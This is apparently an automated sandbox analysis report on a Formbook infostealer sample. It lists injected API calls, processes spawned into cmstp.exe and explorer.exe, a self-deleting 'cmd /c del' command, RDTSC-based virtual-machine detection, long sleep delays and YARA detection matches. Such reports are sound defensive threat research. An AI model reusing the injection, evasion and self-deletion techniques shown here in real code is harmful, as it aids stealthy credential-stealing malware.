          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0455B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0455AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0455A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0455A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0455A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B782E0 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B78260 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B78390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B781B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B782AC NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B7838B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00401030
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_0041B8B1
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_0041B963
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00408C4B
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00408C50
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_0041B493
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_0041B496
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_0041C539
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00402D89
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00402D90
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_0041CE85
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_0041BF12
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_0041C795
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00402FB0
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00E4A553
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00E447A5
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00E4ACFD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0452841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0452B090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045420A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E20A8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E1D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451F900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E2D07
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04510D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04534120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0452D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04542581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04536E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E2EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E22AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E2B28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E1FF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454EBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B7B8B1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B7B954
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B7CE85
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B62FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B7C795
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B7BF12
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B7B496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B7B493
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B68C50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B68C4B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B62D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B62D89
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B7C539
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0451B150 appears 35 times
          Source: QxVf0A9SFT.exe, 00000000.00000000.227936026.0000000000AA2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainSortingSetupIn.exe> vs QxVf0A9SFT.exe
          Source: QxVf0A9SFT.exeBinary or memory string: OriginalFilename vs QxVf0A9SFT.exe
          Source: QxVf0A9SFT.exe, 00000012.00000002.366146647.0000000000E42000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAppDomainSortingSetupIn.exe> vs QxVf0A9SFT.exe
          Source: QxVf0A9SFT.exe, 00000012.00000002.368123180.0000000001AEF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QxVf0A9SFT.exe
          Source: QxVf0A9SFT.exe, 00000012.00000002.367313911.0000000001920000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs QxVf0A9SFT.exe
          Source: QxVf0A9SFT.exeBinary or memory string: OriginalFilenameAppDomainSortingSetupIn.exe> vs QxVf0A9SFT.exe
          Source: QxVf0A9SFT.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 18.2.QxVf0A9SFT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 18.2.QxVf0A9SFT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 18.2.QxVf0A9SFT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 18.2.QxVf0A9SFT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.367232255.00000000018D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.367232255.00000000018D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.366037368.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.366037368.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.501654097.0000000002B60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.501654097.0000000002B60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.366993982.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.366993982.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.499466554.0000000000960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.499466554.0000000000960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/2
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QxVf0A9SFT.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_01
          Source: QxVf0A9SFT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: QxVf0A9SFT.exe, 00000000.00000000.227936026.0000000000AA2000.00000002.00020000.sdmp, QxVf0A9SFT.exe, 00000012.00000002.366146647.0000000000E42000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [USUARIO] ([cve_empleado], [nombre], [ape_pat], [ape_mat], [correo], [id_usuario], [fecha_ingreso], [estado], [Bloqueo], [FechaCaducidad], [id_sucursal], [Autorizar], [jefe], [id_depto]) VALUES (@cve_empleado, @nombre, @ape_pat, @ape_mat, @correo, @id_usuario, @fecha_ingreso, @estado, @Bloqueo, @FechaCaducidad, @id_sucursal, @Autorizar, @jefe, @id_depto);
          Source: QxVf0A9SFT.exeBinary or memory string: UPDATE USUARIO SET password = @Password WHERE (cve_empleado = @Original_cve_empleado); SELECT cve_emp
          Source: QxVf0A9SFT.exe, 00000000.00000000.227936026.0000000000AA2000.00000002.00020000.sdmp, QxVf0A9SFT.exe, 00000012.00000002.366146647.0000000000E42000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [PERFILES] ([CveEmpresa], [cve_perfil], [id_sistema]) VALUES (@CveEmpresa, @cve_perfil, @id_sistema);
          Source: QxVf0A9SFT.exe, 00000000.00000000.227936026.0000000000AA2000.00000002.00020000.sdmp, QxVf0A9SFT.exe, 00000012.00000002.366146647.0000000000E42000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [SEG_MAESTRA] ([cve_perfil], [nom_sistema], [modulo], [cve_menu], [cve_submenu], [cve_ssubmenu], [cve_sssubmenu], [menu]) VALUES (@cve_perfil, @nom_sistema, @modulo, @cve_menu, @cve_submenu, @cve_ssubmenu, @cve_sssubmenu, @menu);
          Source: QxVf0A9SFT.exeBinary or memory string: INSERT INTO [SISTEMA] ([id_sistema], [nom_sistema]) VALUES (@id_sistema, @nom_sistema); SELECT id_sistema, nom_sistema FROM SISTEM
          Source: QxVf0A9SFT.exeBinary or memory string: INSERT INTO [PERFILES] ([CveEmpresa], [cve_perfil], [id_sistema]) VALUES (@CveEmpresa, @cve_perfil, @id_sistema); SELECT CveEmpres
          Source: QxVf0A9SFT.exe, 00000000.00000000.227936026.0000000000AA2000.00000002.00020000.sdmp, QxVf0A9SFT.exe, 00000012.00000002.366146647.0000000000E42000.00000002.00020000.sdmpBinary or memory string: UPDATE [PERFILES] SET [CveEmpresa] = @CveEmpresa, [cve_perfil] = @cve_perfil, [id_sistema] = @id_sistema WHERE (([CveEmpresa] = @Original_CveEmpresa) AND ([cve_perfil] = @Original_cve_perfil) AND ([id_sistema] = @Original_id_sistema));
          Source: QxVf0A9SFT.exe, 00000000.00000000.227936026.0000000000AA2000.00000002.00020000.sdmp, QxVf0A9SFT.exe, 00000012.00000002.366146647.0000000000E42000.00000002.00020000.sdmpBinary or memory string: UPDATE [DEPTO] SET [id_depto] = @id_depto, [nom_depto] = @nom_depto WHERE (([id_depto] = @Original_id_depto) AND ((@IsNull_nom_depto = 1 AND [nom_depto] IS NULL) OR ([nom_depto] = @Original_nom_depto)));
          Source: QxVf0A9SFT.exeBinary or memory string: INSERT INTO [DEPTO] ([id_depto], [nom_depto]) VALUES (@id_depto, @nom_depto); SELECT id_depto, nom_depto FROM DEPTO WHERE (id_dept
          Source: QxVf0A9SFT.exeBinary or memory string: INSERT INTO [SUCURSAL] ([id_sucursal], [nom_sucursal]) VALUES (@id_sucursal, @nom_sucursal); SELECT id_sucursal, nom_sucursal FROM
          Source: QxVf0A9SFT.exeVirustotal: Detection: 44%
          Source: unknownProcess created: C:\Users\user\Desktop\QxVf0A9SFT.exe 'C:\Users\user\Desktop\QxVf0A9SFT.exe'
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess created: C:\Users\user\Desktop\QxVf0A9SFT.exe C:\Users\user\Desktop\QxVf0A9SFT.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QxVf0A9SFT.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess created: C:\Users\user\Desktop\QxVf0A9SFT.exe C:\Users\user\Desktop\QxVf0A9SFT.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QxVf0A9SFT.exe'
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: QxVf0A9SFT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: QxVf0A9SFT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: QxVf0A9SFT.exe, 00000012.00000002.367313911.0000000001920000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000014.00000000.336398999.000000000EC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: QxVf0A9SFT.exe, 00000012.00000002.368123180.0000000001AEF000.00000040.00000001.sdmp, cmstp.exe, 00000015.00000002.502745241.00000000044F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QxVf0A9SFT.exe, 00000012.00000002.368123180.0000000001AEF000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: QxVf0A9SFT.exe, 00000012.00000002.367313911.0000000001920000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000014.00000000.336398999.000000000EC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_0041B2A2 push cs; ret
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00415414 push esp; ret
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00414F46 push cs; ret
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_0041BF12 push dword ptr [8427D5C5h]; ret
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00415FC5 push ebp; ret
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00E4C06A push 00000000h; iretd
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00E447A5 push es; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0456D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B7B2A2 push cs; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B7B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B7B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B7B3FB push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B75FC5 push ebp; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B7BF12 push dword ptr [8427D5C5h]; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B74F46 push cs; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B75414 push esp; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_02B7B45C push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.2914561849
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002B685E4 second address: 0000000002B685EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002B6896E second address: 0000000002B68974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exe TID: 2200Thread sleep time: -48661s >= -30000s
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exe TID: 5508Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeThread delayed: delay time: 48661
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000014.00000000.329623748.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000014.00000000.315086166.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000014.00000000.328359455.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: QxVf0A9SFT.exeBinary or memory string: zE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ]tM5W|Y5fY<YeDL[]nopgyMKX3QZ]tM5WzE[Ti4JD|YJ]s]6e|EIgmYpdl<nfoU[gz45eG<YeDPZeV]WerYHWsYZfGgmTWg4U3EzTqEqVWooe
